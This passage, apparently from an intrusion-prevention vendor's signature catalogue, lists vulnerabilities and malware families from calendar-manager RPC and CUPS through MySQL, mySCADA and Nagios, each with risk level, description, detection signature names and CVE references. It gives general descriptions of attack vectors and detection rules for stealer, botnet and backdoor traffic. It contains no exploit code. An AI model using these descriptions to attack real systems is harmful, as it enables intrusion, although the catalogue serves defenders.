Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability exists in IBM, Hewlett-Packard and Sun Microsystems calendar manager product.

Situation:

Generic_UDP-Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption
Generic_UDP-CMSD-Procedure-0x0a

References:

CVE-2010-4435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4435

BID-36615
http://www.securityfocus.com/bid/36615

OSVDB-70569
http://www.osvdb.org/70569

Multiple-Vendors-CUPS-Hpgl-Filter-Remote-Code-Execution

About this vulnerability:

A vulnerability in Apple Common UNIX Printing System

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Apple's Common Unix Printing System distributed by multiple vendors.

Situation:

HTTP_CS-Multiple-Vendors-CUPS-Hpgl-Filter-Remote-Code-Execution

References:

CVE-2008-3641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3641

BID-31688
http://www.securityfocus.com/bid/31688

Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

High

First detected in:

sgpkg-ips-1725-5242

Last changed:

sgpkg-ips-1725-5242

Platform:

Generic

Software:

ISC BIND

Type:

Resource Starvation

Description:

A denial-of-service vulnerability has been reported in multiple implementations of DNS servers including but not limited to ISC BIND, Microsoft Windows DNS servers, and Unbound DNS servers. The vulnerability is caused by insufficiently limiting the number of DNSKEY and RRSIG records in DNS query responses. A remote, unauthenticated attacker could exploit this vulnerability by providing a specially crafted response to the vulnerable server. Successful exploitation could lead to denial-of-service condition.

Situation:

DNS-TCP_Multiple-Vendors-DNS-DNSSEC-Response-Handling-Possible-Denial-Of-Service
DNS-TCP_Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service

References:

CVE-2023-50387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50387

Multiple-Vendors-DNS-NSEC3-Response-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

High

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

ISC BIND

Type:

Resource Starvation

Description:

A denial-of-service vulnerability has been reported in multiple implementations of DNS servers including but not limited to ISC BIND and Unbound DNS servers. The vulnerability is caused by insufficiently limiting the number of NSEC3 and RRSIG records in DNS query responses. A remote, unauthenticated attacker could exploit this vulnerability by providing a specially crafted response to the vulnerable server. Successful exploitation could lead to denial-of-service condition.

Situation:

DNS-UDP_Multiple-Vendors-DNS-NSEC3-Response-Handling-Denial-Of-Service

References:

CVE-2023-50868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50868

Multiple-Vendors-JS-Engine-Speculative-Execution-Jit-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Edge, Mozilla Firefox and Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-1038-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge; Mozilla Firefox; Chrome

Type:

Malfunction

Description:

There has been reported a vulnerability affecting multiple JavaScript engines. Engines running on Intel, AMD or ARM processors are affected. This vulnerability can be exploited by having a target user visiting a crafted webpage. Successful exploitation could lead in information disclosure.

Situation:

File-Text_Multiple-Vendors-JS-Engine-Speculative-Execution-Jit-Information-Disclosure

References:

CVE-2017-5753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753

Multiple-Vendors-Librpc.dll-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in EMC Legato NetWorker

Risk:

High

First detected in:

sgpkg-ips-291-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Legato NetWorker

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in IBM's Informix Dynamic Server and EMC's Legato Networker. The vulnerability is due to insufficient validation of user input during authentication by the RPC protocol parsing library, librpc.dll. the library is used by the Portmapper service (portmap.exe). An attacker can exploit this vulnerability to cause stack based buffer overflow which can lead to arbitrary code execution in the context of the affected service, which is SYSTEM.

Situation:

Generic_RPC-Librpc.dll-Stack-Buffer-Overflow

References:

CVE-2009-2754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2754

BID-38472
http://www.securityfocus.com/bid/38472

Multiple-Vendors-Libspf2-DNS-Txt-Record-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in SPF Library Project libspf2

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libspf2

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the Sender Policy Framework library (libspf2).

Situation:

DNS-UDP_Multiple-Vendors-DNS-Txt-Record-Parsing-Buffer-Overflow

References:

CVE-2008-2469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2469

BID-31881
http://www.securityfocus.com/bid/31881

Multiple-Vendors-Ntp-Mode-7-Denial-Of-Service

About this vulnerability:

A vulnerability in NTP.org NTP

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Unified Communications Manager; Cisco Systems Unified CallManager

Type:

Resource Starvation

Description:

There is a denial of service vulnerability in NTP. The vulnerability is due to incorrect handling of mode 7 (MODE_PRIVATE) requests. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted mode 7 request to a target NTP server. A successful attack can lead to a resource exhaustion and, ultimately, a denial of service condition of the affected service on a target system. NTP is a product shipped by multiple vendors.

Situation:

NTP_UDP-Multiple-Vendors-Ntp-Mode-7-Denial-Of-Service

References:

CVE-2009-3563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563

BID-37255
http://www.securityfocus.com/bid/37255

Mumblehard-Spambot

About this vulnerability:	Mumblehard spambot/backdoor
Risk:	High
First detected in:	sgpkg-ips-647-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Backdoor
Description:	Mumblehard is an attack campaign that targets Linux and FreeBSD servers. It is used for spreading spam email but possibly also for other purposes.
Situation:	HTTP_CSH-Mumblehard-Spambot-Traffic

Mutiny-Arbitrary-File-Upload

About this vulnerability:

A Mutiny Arbitrary File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mutiny

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Mutiny, versions before 5.0-1.11, which allows remote attackers to upload and execute arbitrary programs and read arbitrary files via the uploadPath, paths[], and newPath parameters.

Situation:

HTTP_CS-Mutiny-Arbitrary-File-Upload

References:

CVE-2013-0136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0136

OSVDB-93444
http://www.osvdb.org/93444

Mutiny-Subnetmask-Injection

About this vulnerability:

A vulnerability in Mutiny network monitoring appliance

Risk:

High

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mutiny

Type:

Code Injection

Description:

Command injection vulnerability for Mutiny monitoring software. An authenticated user may execute commands as root through improper input sanitation.

Situation:

HTTP_CRL-Mutiny-Subnetmask-Injection

References:

CVE-2012-3001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3001

BID-56165
http://www.securityfocus.com/bid/56165

OSVDB-86570
http://www.osvdb.org/86570

MW6-Technologies-Aztec-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in MW6 Technologies Aztec ActiveX (Aztec.dll)

Risk:

Moderate

First detected in:

sgpkg-ips-563-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MW6 Technologies Aztec ActiveX

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in MW6 Technologies Aztec ActiveX Control. The vulnerability is due to improperly handled user input in the 'Data' parameter. A remote attacker can exploit this vulnerability by crafting a malicious HTML document causing a buffer overflow. Successful exploitation could lead to code execution in the security context of the affected user.

Situation:

File-Text_MW6-Technologies-Aztec-ActiveX-Control-Buffer-Overflow

References:

CVE-2013-6040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6040

OSVDB-102323
http://www.osvdb.org/102323

MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in MW6 Technologies Barcode ActiveX

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MW6 Technologies Barcode ActiveX

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in MW6 Technologies Barcode ActiveX control. The vulnerability is a boundary error when processing user input. A remote attacker can exploit this vulnerability by enticing the user to open a crafted HTML file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user.

Situation:

HTTP_SS-MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow
File-Text_MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow

References:

CVE-2009-0298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0298

BID-33451
http://www.securityfocus.com/bid/33451

MW6-Technologies-Datamatrix-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in MW6 Technologies DataMatrix ActiveX (DataMatrix.dll)

Risk:

High

First detected in:

sgpkg-ips-567-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MW6 Technologies DataMatrix ActiveX

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the MW6 Technologies DataMatrix ActiveX Control. The vulnerability is due to improperly handling of the Data property value. A remote attacker can exploit this vulnerability by crafting a malicious HTML document causing a buffer overflow. Successful exploitation could lead to code execution in the security context of the current user.

Situation:

File-Text_MW6-Technologies-Datamatrix-ActiveX-Control-Buffer-Overflow

References:

CVE-2013-6040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6040

OSVDB-102324
http://www.osvdb.org/102324

MW6-Technologies-Maxicode-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in MW6 Technologies MaxiCode ActiveX (MaxiCode.dll)

Risk:

Moderate

First detected in:

sgpkg-ips-565-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MW6 Technologies MaxiCode ActiveX

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in MW6 Technologies MaxiCode ActiveX Control. The vulnerability is due to improperly handled user input in the 'Data' parameter. A remote attacker can exploit this vulnerability by crafting a malicious HTML document causing a buffer overflow. Successful exploitation could lead to code execution in the security context of the affected user.

Situation:

File-Text_MW6-Technologies-Maxicode-ActiveX-Control-Buffer-Overflow

References:

CVE-2013-6040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6040

OSVDB-102323
http://www.osvdb.org/102323

MyBB-Admin-Control-Panel-Code-Injection

About this vulnerability:

A vulnerability in MyBB Group MyBB

Risk:

Moderate

First detected in:

sgpkg-ips-1452-5242

Last changed:

sgpkg-ips-1452-5242

Platform:

Generic

Software:

MyBB

Type:

Input Validation

Description:

Insufficient input validation when parsing user input sent to the Admin Control Panel causes a code injection in MyBB Control Panel. A successful exploit allows an attacker to exeute code as the user the vulnerable application runs as.

Situation:

HTTP_CRL-MyBB-Admin-Control-Panel-Code-Injection

References:

CVE-2022-24734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24734

Mydooma-Backdoor

About this vulnerability:	Backdoor left by MyDoom.A worm
Risk:	High
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	MyDoom
Type:	Backdoor
Description:	This vulnerability is the backdoor left open by the MyDoom.A worm. It is exploited by worms such as Nachi.B/C, DoomJuice (MyDoom.C) and Vesser as well as script kiddies.
Situation:	BD-TCP_Mydoom.a-Backdoor

Myloader

About this vulnerability:	MyLoader
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	MyLoader is a tool for Botnet administrators to manage and gather data from the infected machines.
Situation:	HTTP_CSU-Myloader-Activity

mySCADA-myPRO-7-Hardcoded-Credentials

About this vulnerability:

A vulnerability in mySCADA myPRO 7

Risk:

High

First detected in:

sgpkg-ips-1358-5242

Last changed:

sgpkg-ips-1358-5242

Platform:

Generic

Software:

mySCADA myPRO

Type:

Malfunction

Description:

mySCADA myPRO 7 may allow remote attackers to access the FTP server by using hardcoded credentials.

Situation:

FTP_CS-mySCADA-myPRO-7-Hardcoded-Credentials

References:

CVE-2018-11311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311

mySCADA-myPRO-CVE-2023-28384-Command-Injection

About this vulnerability:

A vulnerability in mySCADA myPRO

Risk:

Moderate

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Generic

Software:

mySCADA myPRO

Type:

Input Validation

Description:

Insufficient sanitization of user data used in commands causes a command injection vulnerability in MySCADA MyPRO. A successful exploit allows an attacker to execute arbitrary commands on the target system with root privileges.

Situation:

File-Text_mySCADA-myPRO-CVE-2023-28384-Command-Injection

References:

CVE-2023-28384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28384

mySCADA-myPRO-CVE-2023-28400-Command-Injection

About this vulnerability:

A vulnerability in mySCADA myPRO

Risk:

Moderate

First detected in:

sgpkg-ips-1596-5242

Last changed:

sgpkg-ips-1596-5242

Platform:

Generic

Software:

mySCADA myPRO

Type:

Input Validation

Description:

Insufficient sanitization of user-sent data causes a command injection vulnerability in mySCADA myPRO. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-mySCADA-myPRO-CVE-2023-28400-Command-Injection

References:

CVE-2023-28400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28400

mySCADA-myPRO-CVE-2023-28716-Command-Injection

About this vulnerability:

A vulnerability in mySCADA myPRO

Risk:

Moderate

First detected in:

sgpkg-ips-1629-5242

Last changed:

sgpkg-ips-1629-5242

Platform:

Generic

Software:

mySCADA myPRO

Type:

Input Validation

Description:

A command injection vulnerability has been reported in mySCADA myPRO. The vulnerability is due to insufficient sanitization of user data used in commands. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in command execution in the security context of the root/SYSTEM user.

Situation:

File-Text_mySCADA-myPRO-CVE-2023-28716-Command-Injection

References:

CVE-2023-28716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28716

mySCADA-myPRO-Datafromviewscripts-Command-Injection

About this vulnerability:

A vulnerability in mySCADA myPRO

Risk:

High

First detected in:

sgpkg-ips-1508-5242

Last changed:

sgpkg-ips-1508-5242

Platform:

Generic

Software:

mySCADA myPRO

Type:

Input Validation

Description:

Situation:

HTTP_CRL-mySCADA-myPRO-Datafromviewscripts-Command-Injection

References:

CVE-2022-2234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2234

mySCADA-myPRO-Manager-Unauthenticated-Command-Injection-CVE-2024-47407

About this vulnerability:

A vulnerability in MyPRO Manager

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Windows

Software:

mySCADA myPRO

Type:

Input Validation

Description:

A vulnerability in mySCADA MyPRO Manager, versions v1.2 and before, which allows remote attackers to execute arbitrary commands on the target system, due to the insufficient user input validation to the email parameter.

Situation:

HTTP_CS-mySCADA-myPRO-Manager-Unauthenticated-Command-Injection-CVE-2024-47407

References:

CVE-2024-47407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47407

MySQL-And-MariaDB-Incorrect-Cast-Policy-Bypass-Vulnerability

About this vulnerability:

A policy bypass vulnerability in MySQL and MariaDB

Risk:

High

First detected in:

sgpkg-ips-459-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL;MariaDB

Type:

Malfunction

Description:

An incorrect cast has been reported in MySQL and MariaDB. The vulnerability is due to the reliance on memcpy() returning a value between -128 and 127. A remote, unauthenticated attacker can exploit this vulnerability by repeatedly trying to connect to the affected database service.

Situation:

Analyzer_MySQL-Brute-Force

References:

CVE-2012-2122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

BID-53911
http://www.securityfocus.com/bid/53911

MySQL-Authentication-Bypass

About this vulnerability:

MySQL allows unauthorized access

Risk:

Moderate

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Malfunction

Description:

MySQL allows unauthorised access, caused by a vulnerability in the check_scramble_323 function. A remote attacker can supply a specially-crafted authentication packet containing an arbitrary passwd_len value, which will allow the attacker to bypass authentication and gain unauthorized access to the database.

Situation:

MySQL_MySQL-Authentication-Bypass
MySQL_Mysql-Authentication-BOF
MySQL_Mysql-Authentication-Bypass-2

References:

CVE-2004-0627
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0627

BID-10654
http://www.securityfocus.com/bid/10654

Mysql-Com_Table_Dump-Function-Stack-Overflow

About this vulnerability:	A vulnerability in MySQL AB MySQL
Risk:	Moderate
First detected in:	sgpkg-ips-436-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MySQL
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability exists in the MySQL database server product. The flaw is created by improperly implemented boundary checks on incoming user input. An authenticated attacker with limited privileges may exploit this issue to execute arbitrary code on the vulnerable host within the context of the server process. In the case where code injection was unsuccessful, the affected service will terminate. Note that on Linux and Unix-based systems, the service will be restarted immediately, whereas on Windows-based systems, this is not the case by default. Regardless, all transactions and connections present at the time of termination will be aborted. In the case where code inject and execution is successful, the behaviour of the target system will depend on the nature of the injected code. On Windows-based systems, the injected code will be run in the security context of the system user, which will cause the system compromise. On Linux and Unix-based systems, the injected code will run with limited privileges.
Situation:	MySQL_TableDump-Function-Stack-Overflow

MySQL-Create-Function-Command-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the CREATE FUNCTION command in MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

MySQL

Type:

Input Validation

Description:

The MySQL CREATE FUNCTION command has a vulnerability in the handling of the function names. If the name of the function that is given to the CREATE FUNCTION command is longer than 50 characters, a stack buffer overflow occurs. A remote attacker is able to exploit this vulnerability to cause a denial of service or to execute arbitrary code on the victim machine.

Situation:

MySQL_Create-Function-Command-Buffer-Overflow

References:

CVE-2005-2558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2558

BID-14509
http://www.securityfocus.com/bid/14509

MySQL-Failed-Login

About this vulnerability:	Failed MySQL login
Risk:	Low
First detected in:	sgpkg-ips-459-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	A failed MySQL login attempt has been detected. This can be a normal failed login, but in large numbers it can may a sign of a brute-force attack.
Situation:	MySQL_SS-Failed-Login

MySQL-Login-Handshake-Information-Disclosure

About this vulnerability:	A vulnerability in MySQL
Risk:	Low
First detected in:	sgpkg-ips-436-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MySQL
Type:	Malfunction
Description:	There is an information disclosure vulnerability in MySQL database. The vulnerability is due to a flaw in the server component responsible for the login handshake procedure and allows an attacker with anonymous access to the database to read sensitive data stored in the memory of the server. The attacker then may use the acquired information to compromise the server or to facilitate other attack attempts. After an attack attempt exploiting this vulnerability, the information in the memory may be disclosed to the attacker. At the same time, the server will continue operating normally in almost all attack scenarios, as the affected process is not likely to perform any more illegal operations.
Situation:	MySQL_CS-MySQL-Login-Handshake-Information-Disclosure

MySQL-Msdos-Device-Name-DoS

About this vulnerability:

Denial of service vulnerability in MySQL database server

Risk:

Low

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MySQL

Type:

Malfunction

Description:

MySQL database server contains a denial of service flaw when handling requests that contain a MS-DOS device name (AUX, CON, COM1, LPT1 or PRN). An authenticated remote attacker with certain privileges could cause a denial of service by sending a use command followed by an MS-DOS device name.

Situation:

MySQL_MySQL-Msdos-Device-Name-DoS

References:

CVE-2005-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0799

OSVDB-14748
http://www.osvdb.org/14748

MySQL-MySQL-Server-Date-Format-Function-Format-String

About this vulnerability:

Format string vulnerability in the handling of the DATE_FORMAT function in MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-74-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Format String

Description:

MySQL has a format string vulnerability in the handling of the DATE_FORMAT function. The vulnerability can be exploited to cause a denial of service condition by giving a malformed first parameter to the DATE_FORMAT function.

Situation:

MySQL_MySQL-Server-Date-Format-Function-Format-String

References:

CVE-2006-3469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3469

BID-19032
http://www.securityfocus.com/bid/19032

OSVDB-27416
http://www.osvdb.org/27416

MySQL-MySQL-yaSSL-SSL-Hello-Message-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of the client Hello message in MySQL

Risk:

High

First detected in:

sgpkg-ips-147-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Buffer Overflow

Description:

MySQL has a buffer overflow vulnerability in the handling of the client Hello message. The vulnerability can be exploited to compromise the vulnerable system by giving a malformed Cipher Specs parameter during a handshaking session.

Situation:

MySQL_MySQL-yaSSL-SSL-Hello-Message-Buffer-Overflow

References:

CVE-2008-0226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226

BID-27140
http://www.securityfocus.com/bid/27140

MySQL-Server-Create-Function-Arbitrary-Code-Execution

About this vulnerability:

Remote code execution vulnerability in MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-23-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Malfunction

Description:

MySQL database server has an arbitrary code execution vulnerability in the CREATE FUNCTION statement. An authenticated remote attacker with INSERT and DELETE privileges could exploit this vulnerability by using CREATE FUNCTION to access libc calls.

Situation:

MySQL_MySQL-Server-Create-Function-Arbitrary-Code-Execution

References:

CVE-2005-0709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0709

BID-12781
http://www.securityfocus.com/bid/12781

OSVDB-14678
http://www.osvdb.org/14678

MySQL-Server-Mysql-Func-Table-Library-Injection-Vulnerability

About this vulnerability:

Arbitrary library injection vulnerability in MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-23-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Malfunction

Description:

MySQL database server contains an arbitrary library injection vulnerability. An authenticated remote user with INSERT or UPDATE privileges could exploit this vulnerability to load and execute arbitrary libraries by using INSERT INTO or UPDATE to modify the mysql.func table.

Situation:

MySQL_MySQL-Server-Mysql-Func-Table-Library-Injection-Vulnerability

References:

CVE-2005-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0710

BID-12781
http://www.securityfocus.com/bid/12781

OSVDB-14677
http://www.osvdb.org/14677

MySQL-Sun-MySQL-mysql_log-Format-String-Vulnerability

About this vulnerability:

Format string vulnerability in the handling of the COM_CREATE_DB and COM_DROP_DB commands in MySQL

Risk:

Moderate

First detected in:

sgpkg-ips-233-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Format String

Description:

MySQL has a format string vulnerability in the handling of the COM_CREATE_DB and COM_DROP_DB commands. The vulnerability can be exploited to cause a denial of service, terminating the affected application due to a read access violation.

Situation:

MySQL_Sun-MySQL-mysql-log-Format-String-Vulnerability

References:

CVE-2009-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2446

BID-35609
http://www.securityfocus.com/bid/35609

OSVDB-55734
http://www.osvdb.org/55734

MySQL-XML-Functions-Scalar-Xpath-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in MySQL

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MySQL

Type:

Input Validation

Description:

There is a vulnerability in the MySQL database engine. The vulnerability is due to insufficient input validation of XML functions used in SQL statements. A remote authenticated attacker can exploit this vulnerability by sending crafted requests to the target host. Successful exploitation causes a denial of service (DoS) condition in the MySQL database services on the target host. In a successful attack, the affected server terminates and all established connections are terminated.

Situation:

MySQL_CS-MySQL-XML-Functions-Scalar-Xpath-Denial-Of-Service

References:

BID-33972
http://www.securityfocus.com/bid/33972

MySQL-yaSSL-CertDecoder::GetName-Buffer-Overflow

About this vulnerability:

A MySQL yaSSL CertDecoder::GetName Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-789-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

YaSSL

Type:

Buffer Overflow

Description:

A vulnerability in the CertDecoder::GetName function of YaSSL, versions before 1.9.9, which allows remote attackers to execute arbitrary code or cause a denial of service condition by sending an X.509 client certificate with a crafted name field.

Situation:

Generic_HTTP-MySQL-yaSSL-CertDecoder::GetName-Buffer-Overflow

References:

CVE-2009-4484
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4484

BID-37640
http://www.securityfocus.com/bid/37640

OSVDB-61956
http://www.osvdb.org/61956

Mystic-Stealer-Malware-C2-Traffic

About this vulnerability:	An attempt to exploit a vulnerability in Mystic Stealer Malware detected
Risk:	High
First detected in:	sgpkg-ips-1603-5242
Last changed:	sgpkg-ips-1603-5242
Platform:	Generic
Software:	Mystic Stealer Malware
Type:	Backdoor
Description:	This fingerprint matches Mystic Stealer malware's traffic to their C2 servers.
Situation:	Generic_CS-Mystic-Stealer-Malware-C2-Traffic

Mytob

About this vulnerability:	MyTob
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	MyTob is a Botnet that is controlled via IRC.
Situation:	Generic_CS-Mytob-Traffic

Nagios-Command-Execution

About this vulnerability:

A Nagios Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios

Type:

Input Validation

Description:

A vulnerability in Nagios, versions before 3.1.1, which allows remote attackers to execute arbitrary commands via metacharacters in the Ping or Traceroute parameters.

Situation:

HTTP_CRL-Nagios-Command-Execution

References:

CVE-2009-2288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2288

OSVDB-55281
http://www.osvdb.org/55281

Nagios-Core-Cgi-Process_cgivars-Off-By-One

About this vulnerability:

A vulnerability in Nagios Enterprises Core

Risk:

Moderate

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios

Type:

Malfunction

Description:

There is an Off-By-One flaw in Nagios Core. The problem is caused by improper boundary check when validating the parameters passed to the application. A remote authenticated attacker could exploit this vulnerability by sending a request with a crafted long parameter value. Successful exploitation could result in the CGI crash.

Situation:

HTTP_CSU-Nagios-Core-Cgi-Process_cgivars-Off-By-One

References:

CVE-2013-7108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7108

Nagios-Core-Config-Manager-Tfpassword-SQL-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Core Config Manager

Risk:

Moderate

First detected in:

sgpkg-ips-553-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios; Nagios XI

Type:

Input Validation

Description:

Nagios Core Config Manager is vulnerable to an SQL Injection vulnerability. The vulnerability is due to a lack of validation on the tfPassword parameter passed to the application. A remote unauthenticated attacker could exploit this vulnerability by sending a request with a crafted tfPassword parameter value. Successful exploitation could result in attacker controlled SQL code being executed on the server or possibly authentication bypass.

Situation:

HTTP_CRL-Nagios-Core-Config-Manager-Tfpassword-SQL-Injection

References:

OSVDB-99942
http://www.osvdb.org/99942

Nagios-History.cgi-Parameter-Buffer-Overflow

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios

Risk:

Moderate

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nagios

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Nagios. The vulnerability is due to insufficient validation of the host parameter when it is processed by the history.cgi program. A remote, authenticated attacker can exploit this vulnerability by sending an excessively long host value. This can lead to code execution in the context of the affected application.

Situation:

HTTP_CRL-Nagios-History.cgi-Parameter-Buffer-Overflow

References:

CVE-2012-6096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6096

BID-56879
http://www.securityfocus.com/bid/56879

OSVDB-88322
http://www.osvdb.org/88322

Nagios-Log-Server-Audit-Log-And-Alert-History-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises Log Server

Risk:

High

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1377-5242

Platform:

Generic

Software:

Nagios Enterprises Log Server

Type:

Input Validation

Description:

Two reflected cross-site scripting vulnerabilities have been reported in Nagios Log Server. The vulnerabilities are due to insufficient validation of user input in HTTP requests to audit log and alert history page with start and end URI query parameters. A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could result in arbitrary script execution in the target user's browser.

Situation:

HTTP_CRL-Nagios-Log-Server-Audit-Log-And-Alert-History-Reflected-Cross-Site-Scripting

